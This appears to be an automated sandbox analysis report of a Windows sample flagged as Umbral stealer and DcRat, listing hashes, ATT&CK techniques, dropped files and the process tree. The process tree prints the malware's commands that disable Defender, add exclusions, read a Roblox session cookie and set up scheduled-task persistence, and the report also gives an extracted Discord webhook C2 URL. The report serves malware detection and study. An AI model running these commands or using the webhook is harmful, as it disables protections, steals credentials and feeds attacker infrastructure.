Overview

overview

10

Static

static

3

4ce4afc5fd...23.exe

windows7-x64

10

4ce4afc5fd...23.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    26-07-2024 03:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4ce4afc5fd856ed5951e35c3efd45fdc03662abf43050fddc564023ef40e6823.exe

  • Size

    3.3MB

  • MD5

    db8da2d409c3dc46afe0dd3454388f9c

  • SHA1

    baa1e8196412a06919e37d888651916aae021b69

  • SHA256

    4ce4afc5fd856ed5951e35c3efd45fdc03662abf43050fddc564023ef40e6823

  • SHA512

    016d678636fafc456e146802da7b5d1b8be3f0b474e335158d65c1df4ae8bb241af43fdd278e99f6d50c6610f0fc775c48621b5d45c5841b904a7e1a971edfc0

  • SSDEEP

    98304:oZ1HRsp8NbXaaIptoNMrF4NOgmwCof84h:oZVIaIpeOrmNOTwCol

Score
10/10
dcratumbralcredential_accessdiscoveryevasionexecutioninfostealerratspywarestealertrojan

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1219193245557325834/Pny7ckgnLuo9kv28SEntCevPyhBWlY4AfJu4MogOozH9-s-mNnQ7UZJcF1RdHsmmAwgC

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Detect Umbral payload 2 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 21 IoCs
    evasiontrojan
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • DCRat payload 7 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

    rat
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Checks whether UAC is enabled 1 TTPs 14 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 5 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 21 IoCs
    evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\4ce4afc5fd856ed5951e35c3efd45fdc03662abf43050fddc564023ef40e6823.exe
    "C:\Users\Admin\AppData\Local\Temp\4ce4afc5fd856ed5951e35c3efd45fdc03662abf43050fddc564023ef40e6823.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2624
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Saransk.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2836
    • C:\Users\Admin\AppData\Local\Temp\Saransk.exe
      "C:\Users\Admin\AppData\Local\Temp\Saransk.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2712
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:948
      • C:\Windows\system32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Saransk.exe"
        3⤵
        • Views/modifies file attributes
        PID:3008
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Saransk.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2912
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:760
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2196
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1196
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:848
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
          PID:2956
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
            PID:1176
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2516
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            3⤵
            • Detects videocard installed
            PID:2272
          • C:\Windows\system32\cmd.exe
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Saransk.exe" && pause
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            PID:2672
            • C:\Windows\system32\PING.EXE
              ping localhost
              4⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:2660
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2708
        • C:\Users\Admin\AppData\Local\Temp\Injector.exe
          "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1704
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Chainnet\8f9Z3.vbe"
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2784
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Chainnet\oniRrs8nIuzVsaH8sYiTK.bat" "
              4⤵
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:756
              • C:\Chainnet\hyperInto.exe
                "C:\Chainnet\hyperInto.exe"
                5⤵
                • UAC bypass
                • Executes dropped EXE
                • Checks whether UAC is enabled
                • Drops file in Program Files directory
                • Drops file in Windows directory
                • Suspicious behavior: EnumeratesProcesses
                • System policy modification
                PID:3068
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\kc0SdEF2Lb.bat"
                  6⤵
                    PID:2136
                    • C:\Windows\system32\w32tm.exe
                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                      7⤵
                        PID:292
                      • C:\Program Files (x86)\Mozilla Maintenance Service\logs\dwm.exe
                        "C:\Program Files (x86)\Mozilla Maintenance Service\logs\dwm.exe"
                        7⤵
                        • UAC bypass
                        • Executes dropped EXE
                        • Checks whether UAC is enabled
                        • Suspicious behavior: EnumeratesProcesses
                        • System policy modification
                        PID:2152
                        • C:\Windows\System32\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2a6c291f-deba-408a-b594-a0ba1b0d3f58.vbs"
                          8⤵
                            PID:1748
                            • C:\Program Files (x86)\Mozilla Maintenance Service\logs\dwm.exe
                              "C:\Program Files (x86)\Mozilla Maintenance Service\logs\dwm.exe"
                              9⤵
                              • UAC bypass
                              • Executes dropped EXE
                              • Checks whether UAC is enabled
                              • Suspicious behavior: EnumeratesProcesses
                              • System policy modification
                              PID:2260
                              • C:\Windows\System32\WScript.exe
                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\52d148d9-c69a-4b1a-aaf2-7f8652975a0e.vbs"
                                10⤵
                                  PID:2516
                                  • C:\Program Files (x86)\Mozilla Maintenance Service\logs\dwm.exe
                                    "C:\Program Files (x86)\Mozilla Maintenance Service\logs\dwm.exe"
                                    11⤵
                                    • UAC bypass
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    • System policy modification
                                    PID:1956
                                    • C:\Windows\System32\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4f8534af-7e89-42c9-859e-0ef9c82f6461.vbs"
                                      12⤵
                                        PID:2368
                                        • C:\Program Files (x86)\Mozilla Maintenance Service\logs\dwm.exe
                                          "C:\Program Files (x86)\Mozilla Maintenance Service\logs\dwm.exe"
                                          13⤵
                                          • UAC bypass
                                          • Executes dropped EXE
                                          • Checks whether UAC is enabled
                                          • System policy modification
                                          PID:448
                                          • C:\Windows\System32\WScript.exe
                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a272eae7-d205-45e5-8386-90447b6b6cd3.vbs"
                                            14⤵
                                              PID:2572
                                              • C:\Program Files (x86)\Mozilla Maintenance Service\logs\dwm.exe
                                                "C:\Program Files (x86)\Mozilla Maintenance Service\logs\dwm.exe"
                                                15⤵
                                                • UAC bypass
                                                • Executes dropped EXE
                                                • Checks whether UAC is enabled
                                                • System policy modification
                                                PID:2804
                                                • C:\Windows\System32\WScript.exe
                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5d84646c-be9c-42a7-92d7-a33f33469ac1.vbs"
                                                  16⤵
                                                    PID:1820
                                                    • C:\Program Files (x86)\Mozilla Maintenance Service\logs\dwm.exe
                                                      "C:\Program Files (x86)\Mozilla Maintenance Service\logs\dwm.exe"
                                                      17⤵
                                                      • UAC bypass
                                                      • Executes dropped EXE
                                                      • Checks whether UAC is enabled
                                                      • System policy modification
                                                      PID:3032
                                                      • C:\Windows\System32\WScript.exe
                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ec6fe162-bfbd-4074-9956-5490199c6d3b.vbs"
                                                        18⤵
                                                          PID:932
                                                        • C:\Windows\System32\WScript.exe
                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e010c2a6-4278-414a-ad9c-42164fdaf970.vbs"
                                                          18⤵
                                                            PID:1052
                                                      • C:\Windows\System32\WScript.exe
                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\82381881-712e-4c86-9680-d199d4018dc7.vbs"
                                                        16⤵
                                                          PID:2072
                                                    • C:\Windows\System32\WScript.exe
                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fb74cd53-1675-4e2e-90ee-549251dcb1b9.vbs"
                                                      14⤵
                                                        PID:2136
                                                  • C:\Windows\System32\WScript.exe
                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9094aaa7-31cf-41bf-af78-64342194c872.vbs"
                                                    12⤵
                                                      PID:2996
                                                • C:\Windows\System32\WScript.exe
                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\db5e1b51-605a-40b5-8bec-069a39eda31e.vbs"
                                                  10⤵
                                                    PID:1012
                                              • C:\Windows\System32\WScript.exe
                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c3239fe9-8ad7-4521-817d-74ad41dcfb07.vbs"
                                                8⤵
                                                  PID:2416
                                      • C:\Windows\SysWOW64\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\Chainnet\file.vbs"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2876
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\dwm.exe'" /f
                                    1⤵
                                    • Process spawned unexpected child process
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2372
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\dwm.exe'" /rl HIGHEST /f
                                    1⤵
                                    • Process spawned unexpected child process
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2944
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\dwm.exe'" /rl HIGHEST /f
                                    1⤵
                                    • Process spawned unexpected child process
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2468
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows NT\dwm.exe'" /f
                                    1⤵
                                    • Process spawned unexpected child process
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2520
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\Windows NT\dwm.exe'" /rl HIGHEST /f
                                    1⤵
                                    • Process spawned unexpected child process
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2264
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows NT\dwm.exe'" /rl HIGHEST /f
                                    1⤵
                                    • Process spawned unexpected child process
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2388
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\Idle.exe'" /f
                                    1⤵
                                    • Process spawned unexpected child process
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2364
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Default User\Idle.exe'" /rl HIGHEST /f
                                    1⤵
                                    • Process spawned unexpected child process
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2736
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Idle.exe'" /rl HIGHEST /f
                                    1⤵
                                    • Process spawned unexpected child process
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2928
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Cookies\cmd.exe'" /f
                                    1⤵
                                    • Process spawned unexpected child process
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2864
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Default\Cookies\cmd.exe'" /rl HIGHEST /f
                                    1⤵
                                    • Process spawned unexpected child process
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2924
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Cookies\cmd.exe'" /rl HIGHEST /f
                                    1⤵
                                    • Process spawned unexpected child process
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:1316
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 10 /tr "'C:\Windows\SchCache\OSPPSVC.exe'" /f
                                    1⤵
                                    • Process spawned unexpected child process
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:1612
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\Windows\SchCache\OSPPSVC.exe'" /rl HIGHEST /f
                                    1⤵
                                    • Process spawned unexpected child process
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:1312
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 5 /tr "'C:\Windows\SchCache\OSPPSVC.exe'" /rl HIGHEST /f
                                    1⤵
                                    • Process spawned unexpected child process
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2716

                                  Network

                                  MITRE ATT&CK Enterprise v15

                                  Reconnaissance

                                  Resource Development

                                  Initial Access

                                  Execution

                                  Command and Scripting Interpreter

                                  1
                                  T1059

                                  PowerShell

                                  1
                                  T1059.001

                                  Scheduled Task/Job

                                  1
                                  T1053

                                  Scheduled Task

                                  1
                                  T1053.005

                                  Persistence

                                  Scheduled Task/Job

                                  1
                                  T1053

                                  Scheduled Task

                                  1
                                  T1053.005

                                  Privilege Escalation

                                  Abuse Elevation Control Mechanism

                                  1
                                  T1548

                                  Bypass User Account Control

                                  1
                                  T1548.002

                                  Scheduled Task/Job

                                  1
                                  T1053

                                  Scheduled Task

                                  1
                                  T1053.005

                                  Defense Evasion

                                  Abuse Elevation Control Mechanism

                                  1
                                  T1548

                                  Bypass User Account Control

                                  1
                                  T1548.002

                                  Hide Artifacts

                                  1
                                  T1564

                                  Hidden Files and Directories

                                  1
                                  T1564.001

                                  Impair Defenses

                                  1
                                  T1562

                                  Disable or Modify Tools

                                  1
                                  T1562.001

                                  Modify Registry

                                  2
                                  T1112

                                  Credential Access

                                  Credentials from Password Stores

                                  1
                                  T1555

                                  Credentials from Web Browsers

                                  1
                                  T1555.003

                                  Unsecured Credentials

                                  1
                                  T1552

                                  Credentials In Files

                                  1
                                  T1552.001

                                  Discovery

                                  Query Registry

                                  1
                                  T1012

                                  Remote System Discovery

                                  1
                                  T1018

                                  System Information Discovery

                                  3
                                  T1082

                                  System Location Discovery

                                  1
                                  T1614

                                  System Language Discovery

                                  1
                                  T1614.001

                                  System Network Configuration Discovery

                                  1
                                  T1016

                                  Internet Connection Discovery

                                  1
                                  T1016.001

                                  Lateral Movement

                                  Collection

                                  Data from Local System

                                  1
                                  T1005

                                  Command and Control

                                  Web Service

                                  1
                                  T1102

                                  Exfiltration

                                  Impact

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\Chainnet\8f9Z3.vbe
                                    Filesize

                                    206B

                                    MD5

                                    b3080903ab3740f3f1346f2f61834c2b

                                    SHA1

                                    a5b37c9ea7a58c9194de44382d75dc4863d3d5b7

                                    SHA256

                                    505642ffc3c57426bb6575eb3ac48ea1f3e303fa5b34ea6ccd3fe2f7021619a1

                                    SHA512

                                    a33ace44bf4936bb2747586d590d762da473840179d9553d0b213f12f11a2d10713fb6bb5637058a40bf0b12f710dfe07930476d8ea5765f0dba816389f9e419

                                    Download Submit

                                  • C:\Chainnet\file.vbs
                                    Filesize

                                    34B

                                    MD5

                                    677cc4360477c72cb0ce00406a949c61

                                    SHA1

                                    b679e8c3427f6c5fc47c8ac46cd0e56c9424de05

                                    SHA256

                                    f1cccb5ae4aa51d293bd3c7d2a1a04cb7847d22c5db8e05ac64e9a6d7455aa0b

                                    SHA512

                                    7cfe2cc92f9e659f0a15a295624d611b3363bd01eb5bcf9bc7681ea9b70b0564d192d570d294657c8dc2c93497fa3b4526c975a9bf35d69617c31d9936573c6a

                                    Download Submit

                                  • C:\Chainnet\hyperInto.exe
                                    Filesize

                                    3.4MB

                                    MD5

                                    d63861446161da73423a6378ab06af5e

                                    SHA1

                                    8d3116fa2ac5d4e7fb9684498f69edf3e976f977

                                    SHA256

                                    c46e261e262516989fb8205f6e939b13fc19326f936229f024b41b9d4956f8bd

                                    SHA512

                                    7bf3f16a5c455dbf902284ba581097b7ecdefcfb9df55053c868f4ae84e9097b4fb6214c9896cc344ea65979516b20df8e35d19c97de79d52ee27fb86e61eb88

                                    Download Submit

                                  • C:\Chainnet\oniRrs8nIuzVsaH8sYiTK.bat
                                    Filesize

                                    27B

                                    MD5

                                    94db4d897ca54289c945a06574084128

                                    SHA1

                                    d4168950c994dacea1402a9570a4735350b86c10

                                    SHA256

                                    a759a78b129faaa486102e6486d595070e7c923bf4159ae7b8eb78fec3c2a461

                                    SHA512

                                    2548059003c4bff60dbe0e9aa5c097bac130ecb7bae7896b83f577bb2aa0e3c1b356545ebc92e3487ef937026c96ef48d2df750b31f0acea9166bfb9342cd28a

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\2a6c291f-deba-408a-b594-a0ba1b0d3f58.vbs
                                    Filesize

                                    739B

                                    MD5

                                    f2e8d5993a21b7c29a396a5b2e252a16

                                    SHA1

                                    c2bdac25996b0fb3b23b199a378dfa7330f526e4

                                    SHA256

                                    1f3e76673f7bf5c5b6db922b13f93ef776b9dccacd2604e9f3cd7440f424dcde

                                    SHA512

                                    4ea4a495ad53b11be21febc81c5261f4bd51cf28f0fb5003c56acbad7a58d94f413fb3e0ee0d3854f56bd1a271f34e6304adeda07756a251a0a9fbb2774cc2d8

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\4f8534af-7e89-42c9-859e-0ef9c82f6461.vbs
                                    Filesize

                                    739B

                                    MD5

                                    6aee448702c77dde582c00e342df7f06

                                    SHA1

                                    1112df943765d9564b52a374f552a34203af0887

                                    SHA256

                                    e9ef606b0d55a2547c58a4d2ca7503536e573fb3cc9bc913ced07efd509c578e

                                    SHA512

                                    214df5ef8c706fed3dac9c0815372ed4a341fbb639e552bd889e0a83188278e6eb95ea4cf4eef8f7bccebd1401920c9878e67206a9867d511f8334351d87f9a9

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\52d148d9-c69a-4b1a-aaf2-7f8652975a0e.vbs
                                    Filesize

                                    739B

                                    MD5

                                    6bcde83f7ffe5696448e2b9cd42a82ad

                                    SHA1

                                    aee553079881b9a967fd3627f48d6cd955c3c582

                                    SHA256

                                    ccd6b1956d76ac4a0827776e1416121d2448191cd22777cd1b2d735651cb4876

                                    SHA512

                                    13a05d7fad88669d5d798cbb16387de49bfa6c98905ede18ddbf6dae63500e4c6c1ca6754ee5240e75dd98f5c79456bf6b59f5494eba917371d99ab88e0519d4

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\5d84646c-be9c-42a7-92d7-a33f33469ac1.vbs
                                    Filesize

                                    739B

                                    MD5

                                    80e6a3dd7c0751dcf62e55dc1eff2d63

                                    SHA1

                                    7b3aa29f92c05a8e12c051639576fd9c2917eb00

                                    SHA256

                                    142c02ad373d9be69240420486cc6093b52c0922803b34fbc206d4f2d4e9f808

                                    SHA512

                                    2eb5d42a45d74adb3fec5cb1df70017b6552484c5eb557d8703529ef7f7db8d03371c3f0552a96e787f949771a8e1573286f0d991f3a60f422e06cd969498a5a

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\Injector.exe
                                    Filesize

                                    3.7MB

                                    MD5

                                    323e22b442e4d4f9930c5b65f6d1028c

                                    SHA1

                                    7dadf78756dd00c68d5094a59dc7bcccf3c8346d

                                    SHA256

                                    eaedca12a90cf9afa1d7e42358571269e726ccd5a5c96b6d98c7b242f08e9e00

                                    SHA512

                                    2da37cfe8005ed1e299ad6c3e676abeafd6160b47bb9888d1cbdcb7a82e7955feedb4286ee6dfbe64a1b62814ff1af11a718074854d2699a4a2975d4fbfd5b2e

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\Saransk.exe
                                    Filesize

                                    227KB

                                    MD5

                                    05c183f8c0d871d6081f1ea4096805e4

                                    SHA1

                                    4a05aba815c8471fca4fcc9a789683385b0c24ca

                                    SHA256

                                    eff59569967501a5e21ff3f8be9cc487e30d23e1538aeb121f9ab0955c308849

                                    SHA512

                                    ef35359087662c4213f667c49182ab794fbb28dfe2a5b9e1fad5729e516b1ef08c2d7230a84e4808b693832d7b4ad43530377886cd2c993407a7fe38333ad347

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\a272eae7-d205-45e5-8386-90447b6b6cd3.vbs
                                    Filesize

                                    738B

                                    MD5

                                    430c153b8275520fb5031b893be8327a

                                    SHA1

                                    7d82ccaba5a564495d9858e982a2ed1d052ad727

                                    SHA256

                                    70744bbd90feea791ead0002004a41f78fa955eb16c6bb7010e01ecc70fdf605

                                    SHA512

                                    babc90309cb8a3aca4e7d23a9e9d0aac065bc4e00d1c4b6ee2bf4e0b4061777b178e05b35a68b5926655d49dd4821f21378f2f33abf4aec665304f5e898f1864

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\c3239fe9-8ad7-4521-817d-74ad41dcfb07.vbs
                                    Filesize

                                    515B

                                    MD5

                                    e2f9a3c8c4e2fe3b38ed9e2a819ad100

                                    SHA1

                                    e77bdbf11eed67c7d2d1fdd5e27ed0f6ed589a85

                                    SHA256

                                    c85e82fd41f46e23ae6572d0b3d5581247c4294f96640beb2f1b88ee6e883027

                                    SHA512

                                    bb77e2204b0759123c34aac467d7a27e081172e4a6540d51c478bccfa92739b2d49cb231d861ee93174a0aafb65253f25a2de650354db9b2aea87ad0313631e9

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\ec6fe162-bfbd-4074-9956-5490199c6d3b.vbs
                                    Filesize

                                    739B

                                    MD5

                                    20baebeb4e09b187b928ab435523ff87

                                    SHA1

                                    b6024c3e574dd9d53247412c55b00b4a6fd18ecb

                                    SHA256

                                    13bb6de39edb0640f215368187de69998dc48c6b8b5c0b1633db744a1637baf3

                                    SHA512

                                    6a6ed67fe4719eff96b40ee92bb2ee7fdee3663e30b20983ebe8d774c18a4a2967fb60c8d670ff11032912ba4351e31f9b731045b5506a547f50d29583cb31fb

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\kc0SdEF2Lb.bat
                                    Filesize

                                    228B

                                    MD5

                                    20758e916044c54cecfbc50ff01e1fc7

                                    SHA1

                                    24e126ed28c0d63e3546613c6b4104d93a31420b

                                    SHA256

                                    8b2f7964aaede3656b26f7c7d2ea1ef579b00f83c81aebc61cd47b49260c47b4

                                    SHA512

                                    fe094838c8895ec5d0e2f148868284f6224a853b4d72ace0b1379bef49837be8c3efc8873df39643f1fcaf11b6788d51278cc94b8b13e935d632de9e0f9a87a9

                                    Download Submit

                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                    Filesize

                                    7KB

                                    MD5

                                    1042e0a8d097ade8a97e2b32f0d4fb39

                                    SHA1

                                    ecea1113091129a8d35a07e0d6cf5960f63cb403

                                    SHA256

                                    1faa25acdcc2a3ed48dd41b417f3fc88230e6ee27cdc9fd62362b6ee4f6083bf

                                    SHA512

                                    b3789c556f22c9409418dc9f283f81cbc7e618b11948de88c7e3a22b9b1c6790ec8a10e1b719ba00ad8aa8aada3dd17d8ee29233eab67cc175c0340cc218395d

                                    Download Submit

                                  • memory/760-57-0x00000000027E0000-0x00000000027E8000-memory.dmp

                                    Filesize

                                    32KB

                                    Download

                                  • memory/760-56-0x000000001B610000-0x000000001B8F2000-memory.dmp

                                    Filesize

                                    2.9MB

                                    Download

                                  • memory/1956-172-0x0000000000CB0000-0x0000000000CC2000-memory.dmp

                                    Filesize

